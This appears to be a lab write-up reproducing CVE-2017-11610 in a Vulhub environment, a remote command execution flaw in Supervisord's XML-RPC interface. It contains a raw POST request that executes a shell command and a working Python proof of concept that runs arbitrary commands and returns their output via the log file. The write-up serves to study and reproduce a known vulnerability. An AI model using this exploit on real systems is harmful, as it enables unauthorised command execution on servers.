当前位置:网站首页>Vulhub vulnerability recurrence 67_ Supervisor
Vulhub vulnerability recurrence 67_ Supervisor
2022-07-06 05:16:00 【Revenge_ scan】
CVE-2017-11610_ Supervisord Remote command execution vulnerability
Preface
Supervisor(http://supervisord.org/) Yes, it is Python One developed client/server service , yes Linux/Unix A process management tool under the system , I won't support it Windows System . It's easy to monitor 、 start-up 、 stop it 、 Restart one or more processes .
Reference link :
- https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
- https://blogs.securiteam.com/index.php/archives/3348
-https://github.com/Supervisor/supervisor/commit/90c5df80777bfec03d041740465027f83d22e27b
Vulnerability environment
shooting range :192.168.4.10_ubuntu
#docker-compose build
docker-compose up -d
After the environment starts , visit `http://your-ip:9001` You can view it Supervisord The page of .
Vulnerability testing
Execute arbitrary commands directly :
```
POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/success</string>
</param>
</params>
</methodCall>
```
Container view success Create success
## About direct echo POC
@Ricter An idea put forward on Weibo , Very effective , Is to write the result of the command execution to log In file , Call again Supervisord Self contained readLog Method reading log file , Read the results .
Write a simple POC: [poc.py](poc.py), Post it directly :
```python
#!/usr/bin/env python3
import xmlrpc.client
import sys
target = sys.argv[1]
command = sys.argv[2]
with xmlrpc.client.ServerProxy(target) as proxy:
old = getattr(proxy, 'supervisor.readLog')(0,0)
logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()
getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile))
result = getattr(proxy, 'supervisor.readLog')(0,0)
print(result[len(old):])
```
Use Python3 Execute and get the results :`./poc.py "http://your-ip:9001/RPC2" "command"`:
边栏推荐
- 从0到1建设智能灰度数据体系:以vivo游戏中心为例
- Implementing fuzzy query with dataframe
- Drive development - the first helloddk
- [leetcode] 18. Sum of four numbers
- Unity gets the width and height of Sprite
- UCF (2022 summer team competition I)
- ByteDance program yuan teaches you how to brush algorithm questions: I'm not afraid of the interviewer tearing the code
- 驱动开发——第一个HelloDDK
- [buuctf.reverse] 159_ [watevrCTF 2019]Watshell
- Sliding window problem review
猜你喜欢
随机推荐
UCF(2022暑期团队赛一)
Unity gets the width and height of Sprite
Class inheritance in yyds dry inventory C
Pickle and savez_ Compressed compressed volume comparison
Upload nestjs configuration files, configure the use of middleware and pipelines
Imperial cms7.5 imitation "D9 download station" software application download website source code
2022半年总结
C AES encrypts strings
Can the feelings of Xi'an version of "Coca Cola" and Bingfeng beverage rush for IPO continue?
饼干(考试版)
Sliding window problem review
Flody的应用
Quelques conseils communs sur l'inspecteur de l'unit é, généralement pour les extensions d'éditeur ou d'autres
驱动开发——第一个HelloDDK
Three methods of Oracle two table Association update
Extension of graph theory
flutter 实现一个有加载动画的按钮(loadingButton)
用StopWatch 统计代码耗时
[noip2008 improvement group] stupid monkey
Basic knowledge and examples of binary tree